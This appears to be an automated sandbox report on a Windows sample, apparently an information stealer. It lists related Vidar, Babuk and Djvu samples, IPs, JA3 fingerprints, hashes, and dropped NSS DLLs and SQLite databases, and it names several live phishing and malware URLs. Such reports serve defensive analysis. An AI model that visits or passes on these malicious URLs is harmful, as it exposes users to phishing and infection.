Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
16:48:09	API Interceptor	1x Sleep call for process: RegAsm.exe modified
16:48:37	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
96.17.209.196	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	sIQywRNC5M.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	184.85.65.125
	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	23.65.44.84
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	184.85.65.125
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	23.66.133.162
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.66.133.162
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	96.17.209.196
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	184.30.90.143
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	23.59.200.146
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.106.57.101
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	23.76.43.59

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	5RiFmXTOMp.elf	Get hash	malicious	Mirai	Browse	104.100.28.29
	http://www.agilgas.com.br/wp-content/uploads/2024/04/tryythgghjhgfj.html#T0RQQ2pCOVhPSTJvNm12WEYvSGFNOUI2Q3J4bElveUFOazNibHR2QWI4SGp2aG4yU2kwVytiSzF6WjZnZXN5YUFpUTM5dmpINHlOM2JXdGVtdUM3c2UyMk1yVXROeVVDVVMzYUdOeHFWdDg9	Get hash	malicious	Phisher	Browse	23.61.208.29
	https://campaign-statistics.com/link_click/PJygYHTMZ2_OXDfP/30633247af9f78d20f1e067eab9a8276	Get hash	malicious	HTMLPhisher	Browse	23.209.84.171
	sIQywRNC5M.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	184.85.65.125
	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	23.65.44.84
	https://i.imgur.com/EoTj4iI.png	Get hash	malicious	Unknown	Browse	184.28.252.71
	https://i.imgur.com/VlAllek.png	Get hash	malicious	Unknown	Browse	184.28.252.71
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	184.85.65.125
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	23.66.133.162
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.66.133.162
HETZNER-ASDE	sIQywRNC5M.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	95.217.9.149
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	95.217.9.149
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	sIQywRNC5M.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	95.217.246.168
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	95.217.246.168
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
37f463bf4616ecd445d4a1937da06e19	mU2p71KMss.exe	Get hash	malicious	Babuk, Djvu	Browse	96.17.209.196
	SecuriteInfo.com.Program.Unwanted.5215.4772.1835.exe	Get hash	malicious	PureLog Stealer	Browse	96.17.209.196
	SecuriteInfo.com.Program.Unwanted.5215.4772.1835.exe	Get hash	malicious	PureLog Stealer	Browse	96.17.209.196
	sIQywRNC5M.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	96.17.209.196
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	96.17.209.196
	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	96.17.209.196
	107. PN-EN-1090-2+A1_2012P.exe	Get hash	malicious	GuLoader, Remcos	Browse	96.17.209.196
	BM-FM_NR.24040718PDF.exe	Get hash	malicious	FormBook, GuLoader	Browse	96.17.209.196
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	96.17.209.196
	IPrstVM17M.exe	Get hash	malicious	Unknown	Browse	96.17.209.196

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\KFBFCAFCBKFI\mozglue.dll	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	Vk2yYa9dHl.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
C:\ProgramData\KFBFCAFCBKFI\freebl3.dll	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	Vk2yYa9dHl.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\DAAFIIJDAAAAKFHIDAAAKJJEGD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBKJDBAAKJDGCBFHCFCG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGDGCGCF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGDGCGCFHIEHIDGDBAAE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDBGHDHC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIDHIEGI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDGCGDBG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFI\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: mJVVW85CnW.exe, Detection: malicious, Browse Filename: Vk2yYa9dHl.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QEO2mJ8xHx.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFI\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: mJVVW85CnW.exe, Detection: malicious, Browse Filename: Vk2yYa9dHl.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QEO2mJ8xHx.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFI\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFI\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFI\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_8ea7d7c3451d3787ce7bc761967a957179df26c0_caf4c063_cca9cbd9-bb13-44d5-a7d0-8815e924c53b\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7019856451026253
Encrypted:	false
SSDEEP:	192:nl63PoJvoPlp0oojiI3jPzzuiFGZ24IO8TVB3:4soNKoojBjLzuiFGY4IO8X
MD5:	C9F53FF6981C5BAC03C2023D51A195A8
SHA1:	9A17AA3C790ACBF847A5161EA2A8F37062CB1185
SHA-256:	90E56C919A0B1F6D8E041DD6681519CA76E234B8CA41F07F5EA524E99614E38B
SHA-512:	37B30229696F5D9781CDC791FA9C3E4E6592BE90EAD15B547E8B8CF4B1825C413701B5B2EE0FC8D1144955DAF8E653EAC9FEACE398042956E564706E9EBABF00
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.4.4.3.6.7.8.6.5.2.1.5.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.4.4.3.6.7.9.0.5.8.3.9.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.a.9.c.b.d.9.-.b.b.1.3.-.4.4.d.5.-.a.7.d.0.-.8.8.1.5.e.9.2.4.c.5.3.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.1.8.6.c.3.b.-.d.6.7.6.-.4.e.b.a.-.8.6.e.c.-.3.4.2.c.f.d.3.7.6.5.5.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.c.-.0.0.0.1.-.0.0.1.4.-.9.2.8.6.-.c.7.6.5.5.6.9.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.0.f.8.b.4.6.1.1.9.8.6.7.e.3.9.e.9.5.d.e.3.b.2.f.3.b.1.a.a.a.9.7.8.4.c.2.6.6.4.d.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA819.tmp.dmp

Download File

